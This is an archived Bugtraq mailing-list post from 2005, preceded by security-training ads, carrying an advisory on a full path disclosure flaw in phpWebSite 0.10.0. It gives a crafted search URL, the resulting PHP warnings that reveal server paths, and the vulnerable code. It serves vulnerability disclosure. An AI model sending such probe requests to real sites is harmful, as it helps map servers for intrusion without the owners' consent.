Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

phpWebSite 0.10.0 Full Path disclosure

from [HaCkZaTaN] Network Security [Permanent Link]
Subject: phpWebSite 0.10.0 Full Path disclosure
Date: 25 Feb 2005 06:52:48 -0000 


/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® [ [ wWw.SoSvulnerable.NeT ] ]® 
--------------------------------------------------------
Program:  phpWebSite 0.10.0
Homepage:  http://phpwebsite.appstate.edu
Vulnerable Versions: All
Risk: High!!
Impact: Full Path disclosure
 
      -==phpWebSite 0.10.0 Full Path disclosure==-
---------------------------------------------------------

- Description
---------------------------------------------------------
phpWebSite provides a complete web site content management
system. Web-based administration allows for easy maintenance
of interactive, community-driven web sites.

A remote attacker may exploit this condition to view full path
This vulnerability is reported to affect phpWebSite versions
up to an including version 0.10.0. 

- Tested
---------------------------------------------------------
LocalHost!! and other phpWebSites

- Explotation
---------------------------------------------------------
index.php?module=search&SEA_search_op=search&SEA_search_module=[NST & SVL]

it'll come out something like:
Warning: search(/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php):
failed to open stream: No such file or directory in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51

Warning: search(/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php):
failed to open stream: No such file or directory in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51

Warning: search(): Failed opening 
'/home/grgfidcd/public_html/ccToronto/mod/[NST /conf/search.php' for inclusion
(include_path='.:/home/grgfidcd/public_html/ccToronto/lib/pear/') in
/home/grgfidcd/public_html/ccToronto/mod/search/class/Search.php on line 51

-----[ Start Vuln Code ] ------------------------------------

  function search() {
    if(!isset($_REQUEST['mod']) || !is_string($_REQUEST['mod'])) {
      $module = "all";
    } else {
      $module = $_REQUEST['mod'];
    }

    $this->lists = array();

    if(isset($_REQUEST['query'])) {
      $this->query = preg_replace("/[^\.A-Za-z0-9_-\s]/", "", 
$_REQUEST['query']);
    } else {
      return $this->results();
    }

-----[ Ends Vulns Code ] ------------------------------------

- Exploit
---------------------------------------------------------
Not Yet xD

- Solutions
--------------------------------------------------------
Not Yet

- References
--------------------------------------------------------
http://neossecurity.net/Advisories/Advisory-05.txt


- Credits
-------------------------------------------------
Discovered by HaCkZaTaN and LINUX <hck_zatan@hotmail.com> - 
<svsecurity@gmail.com>

[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/ 

[ [ wWw.SoSvulnerable.NeT ] ]® - http://sosvulnerable.net/ 

Got Questions? http://sosvulnerable.net  - http://neossecurity.net/ 

Irc.InfoGroup.cl #neosecurityteam
Irc.GigaChat.net #swc
- Greets
--------------------------------------------------------
           Paisterist             
           T0wn3r                
           LINUX                  
           Heap
           Nitrous
           CrashCool
           eL_mEsIaS
           Makoki
           Infektion group
           And my Colombian people

        @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
        '@@@@@''@@'@@@''''''''@@''@@@''@@
        '@@'@@@@@@''@@@@@@@@@'''''@@@
        '@@'''@@@@'''''''''@@@''''@@@
        @@@@''''@@'@@@@@@@@@@''''@@@@@
*/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  phpWebSite 0.10.0 Full Path disclosure, HaCkZaTaN.
Next by Date:  [SECURITY] [DSA 690-1] New bsmtpd packages fix arbitrary command execution, Martin Schulze
Previous by Thread:  phpWebSite 0.10.0 Full Path disclosure, HaCkZaTaN.
Next by Thread:  [SECURITY] [DSA 690-1] New bsmtpd packages fix arbitrary command execution, Martin Schulze
Indexes:  [Date] [Thread] [Top] [All Lists]